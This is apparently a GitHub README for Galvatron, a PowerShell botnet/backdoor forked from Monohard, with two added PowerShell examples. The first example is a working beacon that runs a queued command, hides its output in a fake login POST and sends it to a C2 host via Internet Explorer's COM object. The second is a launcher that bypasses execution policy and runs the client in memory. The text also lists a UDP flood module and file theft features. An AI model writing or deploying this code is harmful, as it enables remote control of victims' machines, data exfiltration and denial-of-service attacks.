
PowerShell fork of Monohard by Carlos Ganoza P. This botnet/backdoor was designed to egress over unencrypted web traffic using very little, but effective, obfuscation. Egress over ICMP and DNS are planned features. The server code is designed to set up the C2 on a LAMP-style server. The default credentials are admin/admin.


khr0x40sh/Galvatron


# Galvatron

PowerShell fork (with upgrades) of the Monohard botnet (Carlos Ganoza P.). Default credentials are admin/admin.

  1. Features

     - Utilizes Internet Explorer (its COM object) as the C2 channel
     - Checks in via an obfuscated POST disguised as a login attempt
     - Posts back stdout and stderr of commands run
     - Contains a udpflood module for DDoS tests
     - Supports download and upload of files
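The check-in described above, as an added example that is not code from Galvatron or Monohard. It runs one task, captures stdout and stderr together, and posts the result through the InternetExplorer.Application COM object as a form login. The C2 host, the form field names, the queued command and the response format are assumptions; `/bot/login.php` is the login page the Install section names for the server, reused here as the page the beacon impersonates. Run it under 32-bit PowerShell, for the reason given under Install.

```powershell
# Added example, not code from Galvatron or Monohard: one check-in round of the kind
# the Features list describes. The C2 host, form field names, the queued command and
# the response format are assumptions for illustration.
# Run under 32-bit PowerShell (see Install): the IE COM object is flaky on x64.

function Invoke-CheckIn {
    param(
        [string]$C2Base     = 'http://c2.example.test',   # hypothetical C2 host
        [string]$Path       = '/bot/login.php',           # login page from the Install section
        [string]$Command    = 'whoami',                   # hypothetical queued task
        [int]   $TimeoutSec = 30
    )

    # Run the task and capture stdout and stderr together; 2>&1 merges the error
    # stream into the output before Out-String flattens it to one string.
    $output = & cmd.exe /c $Command 2>&1 | Out-String

    # Make the beacon look like a form login: "username" carries the host name and
    # the command output rides base64-encoded in "password" (assumed field layout).
    $fields = [ordered]@{
        username = $env:COMPUTERNAME
        password = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($output))
        remember = 'on'
    }
    $body = ($fields.GetEnumerator() | ForEach-Object {
        '{0}={1}' -f [Uri]::EscapeDataString($_.Key), [Uri]::EscapeDataString($_.Value)
    }) -join '&'

    # Internet Explorer's COM object is the transport. Navigate2 takes the POST body
    # as a byte array and extra headers as a CRLF-terminated string. Proxy settings,
    # cookies and User-Agent all come from the user's IE profile, which is why the
    # traffic blends in with ordinary browsing.
    $ie = New-Object -ComObject InternetExplorer.Application
    $ie.Visible = $false
    $postData = [Text.Encoding]::ASCII.GetBytes($body)
    $headers  = "Content-Type: application/x-www-form-urlencoded`r`n"
    $ie.Navigate2("$C2Base$Path", $null, $null, $postData, $headers)

    # Poll until the page is loaded, with a deadline so a dead C2 cannot hang the client.
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    while (($ie.Busy -or $ie.ReadyState -ne 4) -and (Get-Date) -lt $deadline) {
        Start-Sleep -Milliseconds 250
    }
    if ($ie.Busy -or $ie.ReadyState -ne 4) {
        $ie.Quit()
        throw "Check-in to $C2Base$Path timed out after $TimeoutSec s"
    }

    # Assumed response format: the next command in the body, empty if nothing is queued.
    $reply = $ie.Document.body.innerText
    $ie.Quit()
    [Runtime.InteropServices.Marshal]::ReleaseComObject($ie) | Out-Null
    return $reply.Trim()
}

$next = Invoke-CheckIn
if ($next) { Write-Host "Next task: $next" } else { Write-Host 'No task queued' }
```

Because the channel is plain HTTP, the "disguise" is only the shape of the form: any proxy or packet capture that logs POST bodies sees the base64 blob in the password field, and a single host that "logs in" on a fixed interval with a different password every time stands out in web proxy logs.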

  2. Install

     Server

     Requires a typical LAMP setup. Run install.sh for the default setup. This assumes /var/www is your Apache content directory; change the install script as needed. This sets the server up in a default state, and the user assumes the risk of using the default installation. Log in via /bot/login.php. The server code contains several known vulnerabilities, as it merely forks the original code with simple functionality updates. As this is experimental code provided for educational purposes, it is highly encouraged to roll your own and/or not use this code in production environments.

     Client

     Run galvatron.ps1 from the client directory, either from the file or in memory. If using udpflood, ensure that udpflood.ps1 is either local or can be accessed in memory. Ensure the script is run in x86 mode, as the IE COM object currently seems buggy in 64-bit PowerShell.
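A launcher that enforces the client requirements just listed, as an added example and not the project's own launcher: it verifies the two script files are present, re-launches itself under the 32-bit (WOW64) PowerShell host when it finds itself in a 64-bit process, confirms the IE COM object can be created, and then runs galvatron.ps1 either by path or from its text in memory. The `client/` folder layout under the repository root and the `-ClientDir`/`-InMemory` parameter names are assumptions.

```powershell
# Added example, not the project's own launcher: check the client-side requirements
# listed above (x86 process, udpflood.ps1 available) before starting galvatron.ps1.
# The client/ folder layout and the parameter names are assumptions.

param(
    [string]$ClientDir = (Join-Path $PSScriptRoot 'client'),   # assumed checkout layout
    [switch]$InMemory                                          # run the script text, not -File
)

$client   = Join-Path $ClientDir 'galvatron.ps1'
$udpflood = Join-Path $ClientDir 'udpflood.ps1'

if (-not (Test-Path $client)) { throw "galvatron.ps1 not found in $ClientDir" }
if (-not (Test-Path $udpflood)) {
    Write-Warning 'udpflood.ps1 not found locally; the udpflood module only works if the client can fetch it in memory'
}

# The IE COM object misbehaves in 64-bit PowerShell, so re-launch this launcher under
# the WOW64 (32-bit) host whenever we are not already an x86 process.
if ([Environment]::Is64BitProcess) {
    $ps32 = Join-Path $env:windir 'SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
    if (-not (Test-Path $ps32)) { throw "32-bit PowerShell host not found at $ps32" }
    $argList = @('-NoProfile', '-ExecutionPolicy', 'Bypass',
                 '-File', $PSCommandPath, '-ClientDir', $ClientDir)
    if ($InMemory) { $argList += '-InMemory' }
    & $ps32 @argList
    exit $LASTEXITCODE
}

# Now running as x86: confirm the COM object the client depends on can be created.
try {
    $ie = New-Object -ComObject InternetExplorer.Application
    $ie.Quit()
} catch {
    throw "InternetExplorer.Application COM object unavailable: $($_.Exception.Message)"
}

if ($InMemory) {
    # Read the script text and execute it from a ScriptBlock, so no script path is
    # handed to powershell.exe; this is what "run in memory" means here.
    & ([ScriptBlock]::Create((Get-Content -Path $client -Raw)))
} else {
    & $client
}
```

`[Environment]::Is64BitProcess` is the reliable test for bitness: `$env:PROCESSOR_ARCHITECTURE` reports x86 inside a WOW64 process too, but only after the re-launch, so checking the process property before spawning avoids an endless re-launch loop on a 32-bit OS where the SysWOW64 path does not exist.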

Twitter: @khr0x40sh
Email: khr0x40sh@gmail.com
Site: http://khr0x40sh.wordpress.com

